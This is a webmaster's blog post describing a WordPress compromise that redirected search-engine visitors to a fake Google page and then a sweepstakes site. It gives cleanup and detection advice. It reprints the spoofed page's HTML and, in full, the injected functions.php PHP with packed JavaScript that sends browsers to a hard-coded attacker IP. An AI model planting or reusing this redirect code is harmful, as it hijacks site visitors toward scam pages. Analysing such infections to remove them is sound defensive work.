I've decided to rewrite this article in English, as many people seem to have the same trouble but it is very hard to find the solution. If you want this article in Japanese, click here. The Japanese version of this article, "WordPress site automatically redirects visitors who arrive from a search engine" (ワードプレスサイトが検索エンジンから来ると自動的に転送されてしまう症状), is at the link on the left.
The beginning of this matter was when I googled my own site and clicked on the result: it got redirected to the "googosearch.biz" domain.
At first, I thought my PC had been infected with a virus. But when I typed the URL in directly, it did not get redirected at all. Well, very clever. Anyway, I didn't know what had caused this, so I disconnected my PC from the web, ran a virus check and waited the entire night. But nothing.
Next, I ran a check with Malwarebytes over the entire system, but again nothing at all. So, now, what should I do? I decided to step on the mine once again.
After the site had been redirected successfully, it got redirected again to yet another site.
The process is as follows:
- When an infected site is found through a search engine such as Google and the user clicks on the result,
- and the infected site loads partially or entirely, the browser is automatically redirected to a URL starting with "http://googosearch.biz".
- Furthermore, when the "http://googosearch.biz" page loads successfully, it redirects to yet another site; in my case it was a sweepstakes site.
- If the "http://googosearch.biz" page does not load successfully, the browser just stays on that page, which looks like a slightly old version of the Google site.
The "googosearch.biz" domain resolves to the IP address 91.223.89.112. The script injected into the site (shown further down) does not send the visitor to the domain name at all: it sends the browser to that IP address, together with the search term taken from the Google (or other search engine) referrer, and the visitor is then forwarded on to googosearch.biz.
This time the search term was "802.3at", which I had used to search for Ragnite Blue in Google, and it was carried along into the redirect URL:
<code>http://googosearch.biz/search.php?ty=1&terms=802.3at</code>
When the googosearch.biz page in turn redirects successfully, the browser ends up at a URL similar to the one below, although a popup appears first.
http://topusaprizes.com/q/contest–/?sub1=q3&sub2=68226&sub3=1105135348
Like the malicious programs that pose as antivirus software, this website is trying to look like Google. However, it looks like the old Google website, and you can see that it is an incomplete copy of the Google site, or a partially loaded one.
Now, if you have Malwarebytes installed and try accessing this land mine, Malwarebytes successfully denies access to the malicious website "googosearch.biz".
The log from that time:
<code>
09:47:38 Administrator IP-BLOCK 91.223.89.112 (Type: outgoing)
09:47:41 Administrator IP-BLOCK 91.223.89.112 (Type: outgoing)
09:47:47 Administrator IP-BLOCK 91.223.89.112 (Type: outgoing)
</code>
Because the connection was blocked, Chrome couldn't load the page.
Below is the HTML source of the malicious redirect target "googosearch.biz". Do not use it for bad things!
<code>
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>802 - googosearch.biz Search</title>
<style>div,td,.n a,.n a:visited{color:#000}.ts td,.tc{padding:0}.ts,.tb{border-collapse:collapse}.f{color:#666}.flc,a.fl{color:#77c}a,.w,.q:visited,.q:active,.q,.b a,.b a:visited,.mblink:visited{color:#00c}a:visited{color:#551a8b}a:active{color:red}.t{background:#d5dff3;color:#000;padding:5px 1px 4px}.bb{border-bottom:1px solid #36c}.bt{border-top:1px solid #36c}.j{width:34em}.h{color:#36c}.i{color:#a90a08}.a{color:green}.z{display:none}div.n{margin-top:1ex}.n a,.n .i{font-size:10pt}.n .i,.b a{font-weight:bold}.b a{font-size:12pt}#np,#nn,.nr,#logo span,.ch{cursor:pointer;cursor:hand}.ta{padding:3px 3px 3px 5px}#tpa2,#tpa3{padding-top:9px}#mybar{float:left;font-weight:bold;height:22px;padding-left:2px}#gbh{border-top:1px solid #c9d7f1;font-size:0;height:0;position:absolute;right:0;top:24px;width:200%}#gbi{background:#fff;border:1px solid;border-color:#c9d7f1 #36c #36c #a2bae7;font-size:13px;top:24px;z-index:1000}#guser{padding-bottom:7px !important}#mybar,#guser{font-size:13px;padding-top:1px !important}@media all{.gb1,.gb3{height:22px;margin-right:.73em;vertical-align:top}}#gbi,.gb2{display:none;position:absolute;width:8em}.gb2{z-index:1001}#mybar a,#mybar a:active,#mybar a:visited{color:#00c;font-weight:normal}.gb2 a,.gb3 a{text-decoration:none}.gb2 a{display:block;padding:.2em .5em}#mybar .gb2 a:hover{background:#36c;color:#fff}.sl,.r{display:inline;font-weight:normal;margin:0}.sl{font-size:84%}.r{font-size:1em}.e{margin:.75em 0}.sm{display:block;margin:0;margin-left:40px}.slk td{padding-top:5px;padding-left:40px;vertical-align:top;font-size:84%}.slk div{text-indent:-10px;padding-left:10px}.n div,#logo span{background:url(images/nav.png) no-repeat;height:26px;overflow:hidden}.n .nr{background-position:-60px 0;width:16px}#np{width:44px}#nf{background-position:-26px 0;width:18px}#nc{background-position:-44px 0;width:16px}#nn{margin-right:4px;width:66px}#nl{width:46px}#nn,#nl{background-position:-106px 0}#logo{display:block;height:52px;margin:13px 0 7px;overflow:hidden;position:relative;width:150px}#logo span{background-position:0 -26px;height:100%;left:0;position:absolute;top:0;width:100%}body{font-family:arial,sans-serif}.g{margin:1em 0}#sd{font-size:84%;font-weight:bold}#ap{font-size:64%}</style>
<script>window.mybar={};(function(){;var g=window.mybar,a,f,h;function m(b,e,d){b.display=b.display=="block"?"none":"block";b.left=e+"px";b.top=d+"px"}g.tg=function(b){var e=0,d,c,i,j=0,k=window.navExtra;!f&&(f=document.getElementById("mybar"));!h&&(h=f.getElementsByTagName("span"));(b||window.event).cancelBubble=true;if(!a){a=document.createElement(Array.every||window.createPopup?"iframe":"div");a.frameBorder="0";a.id="gbi";a.scrolling="no";a.src="#";document.body.appendChild(a);if(k)for(var n in k){var l=document.createElement("span");l.appendChild(k[n]);l.className="gb2";f.appendChild(l)}document.onclick=g.close}for(;h[j];j++){c=h[j];i=c.className;if(i=="gb3"){d=c.offsetLeft;while(c=c.offsetParent)d+=c.offsetLeft;m(a.style,d,24)}else if(i=="gb2"){m(c.style,d+1,25+e);e+=20}}a.style.height=e+"px"};g.close=function(b){a&&a.style.display=="block"&&g.tg(b)};})();</script>
</head>
<body topmargin="3" bgcolor="#ffffff" marginheight="3">
<div id="mybar">
<nobr>
<span class="gb1"><a href="/">Web</a></span>
<span class="gb1"><a href="search.php?terms=cash">Cash</a></span>
<span class="gb1"><a href="search.php?terms=insurance">Insurance</a></span>
<span class="gb1"><a href="search.php?terms=gambling">Gambling</a></span>
<span class="gb1"><a href="search.php?terms=download">Download</a></span>
<span class="gb1"><a href="search.php?terms=domains">Domains</a></span>
</nobr>
</div>
<div id="gbh"></div>
<div id="guser" style="padding: 0pt 0pt 4px; font-size: 84%;" width="100%" align="right"><nobr><a href="search.php?terms=weather">Weather</a></nobr></div>
<table class="tb" style="clear: left;" width="100%">
<tbody>
<tr>
<form method="get" action="/search.php">
<td style="padding: 0pt 0pt 7px 0px;" valign="top" width="100%">
<table class="tb" style="margin-top: 25px;" border=0>
<tbody>
<tr>
<td class="tc" nowrap="nowrap">
<input name="terms" size="41" maxlength="2048" value="802" title="Search" type="text"><input value="Search" type="submit"></td>
</tr>
</tbody>
</table>
</td>
</form>
</tr>
</tbody>
</table>
<table class="t bt" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td nowrap="nowrap"><span id="sd">&nbsp;Web&nbsp;</span></td>
<td align="right" nowrap="nowrap"><font size="-1">Results for <b>802</b>. (<b>0</b> seconds)&nbsp;</font> </td>
</tr>
</tbody>
</table>
<div id="res">
<div> </div>
<br clear="all">
</div>
<center>
<br clear="all">
<table class="ft t bb bt" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody>
<tr>
<td align="center">&nbsp;<br>
<table align="center" border="0" cellpadding="0" cellspacing="0">
<form method="get" action="/search.php">
<tbody>
<tr>
<td nowrap="nowrap">
<font size="-1">
<input name="terms" size="31" maxlength="2048" value="802" title="Search" type="text">
<input value="Search" type="submit">
</font>
<br /><br />
</td>
</tr>
</tbody>
</form>
</table>
</td>
</tr>
</tbody>
</table>
</center>
<center>
<p> </p>
<hr class="z">
<div style="padding: 2px;" class=""><font size="-1">&#169;2008-2011 googosearch.biz</font> </div>
</center>
</body>
</html>
</code>
Below is the code that actually does the bad thing. It had been planted in the theme's "functions.php" file. It hooks WordPress's get_footer action, and on roughly every other request (time()%2 == 0) to a visitor who is not logged in it prints a packed JavaScript snippet into the page. Unpacked, that snippet reads document.referrer and, only if the visitor arrived from Google, MSN, Yahoo, AltaVista, AOL or Ask, sends the browser to http://91.223.89.112/go.php?sid=7&terms= followed by the original search term. That is exactly why typing the URL in directly, or browsing the site while logged in as its administrator, never triggered the redirect.
<code>
<?php
// Injected into the theme's functions.php. Runs whenever a page calls get_footer().
add_action('get_footer', 'add_sscounter');

function add_sscounter(){
    echo '<!--scounter-->'; // marker left in every page's HTML; handy when searching for the infection
    if(function_exists('is_user_logged_in')){
        // only on even-numbered seconds, and never for a logged-in user, so the site owner rarely sees it
        if(time()%2 == 0 && !is_user_logged_in()){
            // packed (p,a,c,k,e,r) JavaScript: reads document.referrer and, if the visitor came from a
            // search engine, sends the browser to http://91.223.89.112/go.php?sid=7&terms=<search term>
            echo "<script language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\b'+e(c)+'\\\b','g'),k[c]);return p}('o r=a.e,t=\"\",q;5(r.4(\"m.\")!=-1)t=\"q\";5(r.4(\"b.\")!=-1)t=\"q\";5(r.4(\"c.\")!=-1)t=\"p\";5(r.4(\"f.\")!=-1)t=\"q\";5(r.4(\"g.\")!=-1)t=\"h\";5(r.4(\"i.\")!=-1)t=\"q\";5(t.6&&((q=r.4(\"?\"+t+\"=\"))!=-1||(q=r.4(\"&\"+t+\"=\"))!=-1))j.k=\"l://9\"+\"1.\"+\"n\"+\"3\"+\".\"+\"8\"+\"9.1\"+\"s/\"+\"u.p\"+\"v?w\"+\"d=7&t\"+\"x\"+\"y=\"+r.z(q+2+t.6).A(\"&\")[0];',37,37,'||||indexOf|if|length||||document|msn|yahoo||referrer|altavista|aol|query|ask|window|location|http|google|22|var||||12||go|hp|si|er|ms|substring|split'.split('|'),0,{}))</script>";
        }
    }
}
?>
</code>
If you're having this problem, delete the above code from your "functions.php" file and upload the corrected file to your server, and everything should be as good as before. Before calling it done, also search the rest of the WordPress install (other theme files, plugins, wp-config.php) for the "<!--scounter-->" marker and the "eval(function(p,a,c,k,e,r)" string, since the same snippet can be planted in more than one file, and change the passwords of every account that can write to those files: deleting the snippet removes the symptom, not the access that was used to plant it.